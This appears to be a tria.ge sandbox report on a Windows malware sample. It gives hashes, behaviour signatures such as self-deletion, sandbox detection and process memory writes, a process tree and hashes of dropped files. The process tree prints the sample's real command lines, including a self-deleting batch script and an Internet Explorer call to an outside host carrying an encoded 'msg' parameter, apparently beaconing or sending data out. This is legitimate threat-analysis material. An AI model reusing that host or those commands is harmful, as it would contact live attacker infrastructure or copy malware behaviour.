Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
70s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
25/08/2024, 09:38
General
-
Target
c074e4ed3c8c3c1cdd3b12b63bb6f6a2_JaffaCakes118.exe
-
Size
158KB
-
MD5
c074e4ed3c8c3c1cdd3b12b63bb6f6a2
-
SHA1
7e6c8d1b89677a0939d6d368d616631a62b877d3
-
SHA256
9d256b7f879843ceb9f60c2e1e1f80fead34d193df640189dea485b5cc11778d
-
SHA512
7bddfc809841f8d9de5b8c2e6afd14f3b63cdad181ed2428c82a64cf38bdd7540e265996d469333a272665bd1f439d1da34883e4ef27dbb916c151ae44f4d2ec
-
SSDEEP
3072:fwABjrG3Vi/cOBLUsmyi4AHhmTdI3wIe0HRDLVT/sOrVzzXk:oGjrUVecOJUsmdmdI3vPRDLp/s0z0
Malware Config
Signatures
-
Deletes itself 1 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 3 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 12 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\c074e4ed3c8c3c1cdd3b12b63bb6f6a2_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\c074e4ed3c8c3c1cdd3b12b63bb6f6a2_JaffaCakes118.exe"1⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\58526723bc67aa405c32b839be11cee0.bat2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://wl.cabolar.com/v3062/repins.jpg?msg=I6xSbPOMgVIJNOEwDLoVvfSLX9Ml5ZXAXFbuUAGlLLf2awRl3GdaHAwevOW2xxVRL1iVTU45UE72AimOl9nKFarzbofA8yr5Lyvr8Oqctd43pLUkEwf54SR%2F1mpE1eQN2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2872 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342B
MD561da47eb6d4148feabc47dabb3d74da0
SHA11a099227527a5ad3d788bb0ff24bdeb31459bee3
SHA256bd91578dff84ffd17f2ce6ce3407a58b074d2f7652106beefbfae72391c5b2a6
SHA512888ecf34ff60e76f02021aca6aaaf09981a4581d549afb4bfe19a75e103b2dccc356090de9f6292ee8bc94c0061716f48e1c38875361c772fe70d59c4518f34c
-
Filesize
342B
MD5eaa062d9cde8910356b57ea18ae3dbf3
SHA1bcab79c75e332f00a1ab0088ba338b7e953952f8
SHA2566d21d56770fdf78c247467081b4d3b1474c7984fd3a5e65c718e5cd597445f0d
SHA5122d56ecf4389263ba073a592ef1a79498a09c97e1a1aa08f49ac6d9dc93fba6855f8b2aaca7d8b0a250938eb0476738543642543996253efe9145498225d46f64
-
Filesize
342B
MD505c45c91cee39e03b6e511c784dae9b7
SHA1ddba0c5a077ac8f22c1c5310424ecdcf4d6384ae
SHA2563424d742cecec9484ca86b72317d3a76f877b587e056ee57e35b305842b776c7
SHA512cc609a25ffd95316647a846a7ea9152470a972ce776cb5044a3e7ee1cd578783877c74986efcfc7576db29ed7937a43813a02cb588d6f157839321e87c63a920
-
Filesize
342B
MD51da5ad56876fc50942cab1918e430316
SHA1636060065c6e2cd64be09ee3e61e61592a750ae6
SHA2563559b0c738b5191677a1bdafa0f1286373be9299d9509adc3fd2f498e73e0155
SHA512bf9c3dae412b856a1ba027e0a0fb5472e88386fc3e9bd59fe338c1f6236bdf90422bd401aeb0f5c6c43bd0bfb55a1ed3285809cbf266ccd76c3622d44ee5739f
-
Filesize
342B
MD5bad53c7e9228e2eb8b2f089bfe1950f6
SHA1c65413fd78278d6630b4ca468d1f292a756ad55f
SHA2562099560b32e54024600867f2365c37e1455cfd2053f81867a7264963968055db
SHA512b6903596e4a2acc3aea26428679eede2afb6a2b4ee555b3e78b0e513b51a6ae95f3dfe0bc922462fe2257bcade4e75fb957c44dea47558a407b16657fbeeba5f
-
Filesize
342B
MD562bdd4fc2549a48c9659db8dda834cef
SHA16214722905678e5cbcb9f029f10bdf9d431d9f96
SHA256667ad8ae73a67b56794d1622507fd396de8fd45bce326291bb0145650251da99
SHA51205f9b756ce6de2f870cad920878f499952597f0fdadf16500a78f6f8985f3346165f335054ab1d1ba074963d7fe263a5f322e835c8b292b38a40942a023982b3
-
Filesize
342B
MD583a27dc413f3263da04adb9becd84f1a
SHA18e3d6c4065188e598aa0b425370212302f2841da
SHA2567659d0063848a8a56828073f98f35aead10c64dd18a0cc5ef5f33e48f527b4c8
SHA5124a385444a7ce638e87729a6aee0a2e44a38e5d3a8ff0c7fa23ad1bb5948b0c51ee369df4ead0c17f2975641b7efb724b6db026acbc41e0ae388b83b3a93eff65
-
Filesize
342B
MD5a8c193737805d4c86704137b83b052a7
SHA1699ccf1aefcad855bb4a43316e757fa5123ca693
SHA25647254a53d992bb1c63e991796a6be03d960b0b8c1b9402a1ad604ecbf1f23fe9
SHA5128258fa541d70ddb448d75390b62beafefca82d6c877b285a002aabf2a2be9762f54f9e9374fc22c5c7839ec51f9f912d518dfe734055d3afc6aa1eb7a59c07ff
-
Filesize
342B
MD5dd2293f0ee6cfc7d4f2091d0431d0b3c
SHA19778ddaf87b07451981b85d1f03968c1718e85fd
SHA256d3acb3672b860405954ed09d58ade16d21ea60368094e4a4bce01ad0404900de
SHA51214112c13b6459a7dc1b1ca38c690a7d365916d4d6238cd3493dfb21eb02cbf1e77a305d34199251e8d4e131fef7e877547e946bd6834042f0e0322d38b90a40a
-
Filesize
342B
MD5b4412d3bdbeda96d7d21306da8f49163
SHA10834dfde5792490a45cec5241ee012094eea64ba
SHA256bbad09d5ef0a4e321807de44ef6c0439401338b6c846ad5757c7c21dc70ecb7f
SHA512f5939a252854b275758974ff20a75cf663eba393056f39b10a70e208037f7c447672f0f9e8de31fc16719f84a211c13e97672220961e1ffa4637f486c3aa9ae2
-
Filesize
342B
MD5e0285cf3821f8472328c59e6078e3a70
SHA1c16b80d01350b432ecb1ecedeed99a3c45446fa0
SHA256e571c96e8e898634a90246a508570325bd68bc7b6e17528a3d1e7195b61ffa66
SHA5121e6047d462423991d7800ee4cdd9e780e2b15b16d5da9d01d95cb2cfca60af7ab8328222cd8de89a18cbd7d79bafaec67ad381d60e433e531fa2cebfdecf0d59
-
Filesize
342B
MD54858398680168f1c30a5c6b025876b2a
SHA1955039118c21c5ce3b33ce9b142942b2cc073fb8
SHA256c031a17ab31b675a4a3020655c04fca6efc2562dab73927d1fffc01ace444a19
SHA512ac19a9f342c595663a2d0e77198d1a856dba8cb39cafd40cdd08bd7d48441f4009ccf89521861a945a843d0604ccba05067862697f0f90422b1fc390321dcd2a
-
Filesize
209B
MD5cc8a3da8e2d6bedf686c33aa3587666c
SHA1592eebf9934d4ea7fc01d4cbb2b262d06809ece8
SHA2566e1da01b327c51a437c3604e6a9013a6e306f2bd699a6622c48877e9429dc57a
SHA5126ac69ec21620fac88765382cf31268aa6e7f28d277bdf44c5bcb675f3e71796aa4d1a6ebfbbb4735945e020b9135d24e0be94eb013429d6267f7cb1c92dd1a4c
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
212KB
-
Filesize
212KB